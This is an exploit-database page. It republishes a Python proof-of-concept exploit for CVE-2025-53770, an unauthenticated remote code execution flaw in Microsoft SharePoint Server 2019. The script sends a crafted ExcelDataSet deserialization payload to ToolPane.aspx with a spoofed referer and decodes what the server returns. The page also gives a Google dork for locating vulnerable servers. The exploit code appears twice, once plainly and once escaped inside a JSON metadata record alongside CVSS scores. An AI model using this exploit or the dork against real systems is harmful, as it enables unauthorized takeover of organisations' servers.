Microsoft SharePoint Server 2019 (16.0.10383.20020) – Remote Code Execution (RCE)

9.8 / 10

CRITICAL

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Description

Exploit Title:...

Visit Original Source

Basic Information

ID EDB-ID:52405

Published Aug 11, 2025 at 00:00

Affected Product

Affected Versions # Exploit Title: Microsoft SharePoint Server 2019 – Remote Code Execution (RCE)
# Google Dork: intitle:"Microsoft SharePoint" inurl:"/_layouts/15/ToolPane.aspx"
# Date: 2025-08-07
# Exploit Author: Agampreet Singh (RedRoot Tool Maker – https://github.com/Agampreet-Singh/RedRoot)
# Vendor Homepage: https://www.microsoft.com
# Software Link: https://www.microsoft.com/en-us/microsoft-365/sharepoint/collaboration
# Version: SharePoint Server 2019 (16.0.10383.20020)
# Tested on: Windows Server 2019 (x64)
# CVE: CVE-2025-53770

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

"""
Exploit Author: Agampreet Singh (RedRoot Tool Maker)
RedRoot Repository: https://github.com/Agampreet-Singh/RedRoot
This PoC demonstrates unauthenticated RCE by exploiting unsafe deserialization in SharePoint’s ToolPane.aspx via the Scorecard:ExcelDataSet control.
FOR EDUCATIONAL AND AUTHORIZED SECURITY TESTING PURPOSES ONLY.
"""

import requests
import base64
import gzip
import re
import sys

def exploit_sharepoint(target_url):
print(f"[+] Target: {target_url}")

headers = {
"Referer": "/_layouts/SignOut.aspx",
"Content-Type": "application/x-www-form-urlencoded"
}

payload = '''
<%@ Register Tagprefix="Scorecard" Namespace="Microsoft.PerformancePoint.Scorecards" Assembly="Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %>
<%@ Register Tagprefix="asp" Namespace="System.Web.UI" Assembly="System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" %>
<asp:UpdateProgress ID="UpdateProgress1" DisplayAfter="10" runat="server" AssociatedUpdatePanelID="upTest">
<ProgressTemplate>
<div class="divWaiting">
<Scorecard:ExcelDataSet CompressedDataTable="H4sIAADEfmgA/4WRX2uzMBTG7/0Ukvs06ihjQb3ZbgobG1TYeO9OY6yBJpGTdHbfvudVu44x6FUkPn9+PEnK1nTdHuV8gE1P9uCCtKGFCBU7opNB9dpC4NYo9MF3kStvJen4rGKLZ4645bkU8c+c1Umalp33/0/62gGmC45pK9bA7qBZOpdI9OMrtpryM3ZR9RAee3B7HSpmXNAYdTuFTnGDVwvZKZiK9TEOUohxHFfj3crjXhRZlouPl+ftBMspIYJTVHlxEcQt13cdFTY6xHeEYdB4vaX7jet8vXERj8S/VeCcxicdtYrGuzf4OnhoSzGpftoaYykQ7FAXWbHm2T0v8qYoZP4g1+t/pbj+vyKIPxhKQUssEwvaeFpdTLOX4tfz18kZONVdDRICAAA=" DataTable-CaseSensitive="false" runat="server"></Scorecard:ExcelDataSet>
</div>
</ProgressTemplate>
</asp:UpdateProgress>
'''.strip()

data = {
"MSOTlPn_Uri": target_url,
"MSOTlPn_DWP": payload
}

try:
response = requests.post(
f"{target_url}/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx",
headers=headers,
data=data,
verify=False,
timeout=10
)

if response.status_code != 200:
print(f"[-] Unexpected HTTP response: {response.status_code}")
return

match = re.search(r'CompressedDataTable="([^&]+)', response.text)
if not match:
print("[-] No CompressedDataTable found in response.")
return

compressed_b64 = match.group(1)
print("[+] Compressed payload extracted.")

compressed_data = base64.b64decode(compressed_b64)
decompressed_data = gzip.decompress(compressed_data)

decoded_output = decompressed_data.decode('utf-8', errors='ignore')
print("[+] Payload decoded successfully. Dumping to file...")

output_file = "/tmp/sharepoint_decoded_payload.txt"
with open(output_file, "w", encoding="utf-8") as f:
f.write(decoded_output)

print(f"[+] Saved to {output_file}")
print("[*] Summary Matches:")
for keyword in ["IntruderScannerDetectionPayload", "ExcelDataSet", "divWaiting", "ProgressTemplate", "Scorecard"]:
if keyword in decoded_output:
print(f" - Found: {keyword}")

except Exception as e:
print(f"[!] Exploit failed: {e}")

if __name__ == "__main__":
if len(sys.argv) != 2:
print("Usage: python3 cve-2025-53770.py https://target.com")
sys.exit(1)
target = sys.argv[1].strip().rstrip('/')
exploit_sharepoint(target)

{
    "lastseen": "2025-08-11T18:06:44",
    "description": "Exploit Title:...",
    "published": "2025-08-11T00:00:00",
    "modified": "2025-08-11T00:00:00",
    "type": "exploitdb",
    "title": "Microsoft SharePoint Server 2019 (16.0.10383.20020) - Remote Code Execution (RCE)",
    "source": "",
    "references": "",
    "id": "EDB-ID:52405",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-53770"
    ],
    "sourceData": "# Exploit Title: Microsoft SharePoint Server 2019 \u2013 Remote Code Execution (RCE)\r\n# Google Dork: intitle:\"Microsoft SharePoint\" inurl:\"/_layouts/15/ToolPane.aspx\"\r\n# Date: 2025-08-07\r\n# Exploit Author: Agampreet Singh (RedRoot Tool Maker \u2013 https://github.com/Agampreet-Singh/RedRoot)\r\n# Vendor Homepage: https://www.microsoft.com\r\n# Software Link: https://www.microsoft.com/en-us/microsoft-365/sharepoint/collaboration\r\n# Version: SharePoint Server 2019 (16.0.10383.20020)\r\n# Tested on: Windows Server 2019 (x64)\r\n# CVE: CVE-2025-53770\r\n\r\n#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\r\n\"\"\"\r\nExploit Author: Agampreet Singh (RedRoot Tool Maker)\r\nRedRoot Repository: https://github.com/Agampreet-Singh/RedRoot\r\nThis PoC demonstrates unauthenticated RCE by exploiting unsafe deserialization in SharePoint\u2019s ToolPane.aspx via the Scorecard:ExcelDataSet control.\r\nFOR EDUCATIONAL AND AUTHORIZED SECURITY TESTING PURPOSES ONLY.\r\n\"\"\"\r\n\r\nimport requests\r\nimport base64\r\nimport gzip\r\nimport re\r\nimport sys\r\n\r\ndef exploit_sharepoint(target_url):\r\n    print(f\"[+] Target: {target_url}\")\r\n\r\n    headers = {\r\n        \"Referer\": \"/_layouts/SignOut.aspx\",\r\n        \"Content-Type\": \"application/x-www-form-urlencoded\"\r\n    }\r\n\r\n    payload = '''\r\n<%@ Register Tagprefix=\"Scorecard\" Namespace=\"Microsoft.PerformancePoint.Scorecards\" Assembly=\"Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c\" %>\r\n<%@ Register Tagprefix=\"asp\" Namespace=\"System.Web.UI\" Assembly=\"System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35\" %>\r\n<asp:UpdateProgress ID=\"UpdateProgress1\" DisplayAfter=\"10\" runat=\"server\" AssociatedUpdatePanelID=\"upTest\">\r\n  <ProgressTemplate>\r\n    <div class=\"divWaiting\">\r\n      <Scorecard:ExcelDataSet CompressedDataTable=\"H4sIAADEfmgA/4WRX2uzMBTG7/0Ukvs06ihjQb3ZbgobG1TYeO9OY6yBJpGTdHbfvudVu44x6FUkPn9+PEnK1nTdHuV8gE1P9uCCtKGFCBU7opNB9dpC4NYo9MF3kStvJen4rGKLZ4645bkU8c+c1Umalp33/0/62gGmC45pK9bA7qBZOpdI9OMrtpryM3ZR9RAee3B7HSpmXNAYdTuFTnGDVwvZKZiK9TEOUohxHFfj3crjXhRZlouPl+ftBMspIYJTVHlxEcQt13cdFTY6xHeEYdB4vaX7jet8vXERj8S/VeCcxicdtYrGuzf4OnhoSzGpftoaYykQ7FAXWbHm2T0v8qYoZP4g1+t/pbj+vyKIPxhKQUssEwvaeFpdTLOX4tfz18kZONVdDRICAAA=\" DataTable-CaseSensitive=\"false\" runat=\"server\"></Scorecard:ExcelDataSet>\r\n    </div>\r\n  </ProgressTemplate>\r\n</asp:UpdateProgress>\r\n'''.strip()\r\n\r\n    data = {\r\n        \"MSOTlPn_Uri\": target_url,\r\n        \"MSOTlPn_DWP\": payload\r\n    }\r\n\r\n    try:\r\n        response = requests.post(\r\n            f\"{target_url}/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx\",\r\n            headers=headers,\r\n            data=data,\r\n            verify=False,\r\n            timeout=10\r\n        )\r\n\r\n        if response.status_code != 200:\r\n            print(f\"[-] Unexpected HTTP response: {response.status_code}\")\r\n            return\r\n\r\n        match = re.search(r'CompressedDataTable=\"([^&]+)', response.text)\r\n        if not match:\r\n            print(\"[-] No CompressedDataTable found in response.\")\r\n            return\r\n\r\n        compressed_b64 = match.group(1)\r\n        print(\"[+] Compressed payload extracted.\")\r\n\r\n        compressed_data = base64.b64decode(compressed_b64)\r\n        decompressed_data = gzip.decompress(compressed_data)\r\n\r\n        decoded_output = decompressed_data.decode('utf-8', errors='ignore')\r\n        print(\"[+] Payload decoded successfully. Dumping to file...\")\r\n\r\n        output_file = \"/tmp/sharepoint_decoded_payload.txt\"\r\n        with open(output_file, \"w\", encoding=\"utf-8\") as f:\r\n            f.write(decoded_output)\r\n\r\n        print(f\"[+] Saved to {output_file}\")\r\n        print(\"[*] Summary Matches:\")\r\n        for keyword in [\"IntruderScannerDetectionPayload\", \"ExcelDataSet\", \"divWaiting\", \"ProgressTemplate\", \"Scorecard\"]:\r\n            if keyword in decoded_output:\r\n                print(f\"  - Found: {keyword}\")\r\n\r\n    except Exception as e:\r\n        print(f\"[!] Exploit failed: {e}\")\r\n\r\nif __name__ == \"__main__\":\r\n    if len(sys.argv) != 2:\r\n        print(\"Usage: python3 cve-2025-53770.py https://target.com\")\r\n        sys.exit(1)\r\n    target = sys.argv[1].strip().rstrip('/')\r\n    exploit_sharepoint(target)",
    "sourceHref": "https://www.exploit-db.com/raw/52405",
    "cvss": {
        "score": 9.8,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://www.exploit-db.com/exploits/52405",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Microsoft SharePoint Server 2019 (16.0.10383.20020) – Remote Code Execution (RCE)_EDB-ID:52405

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply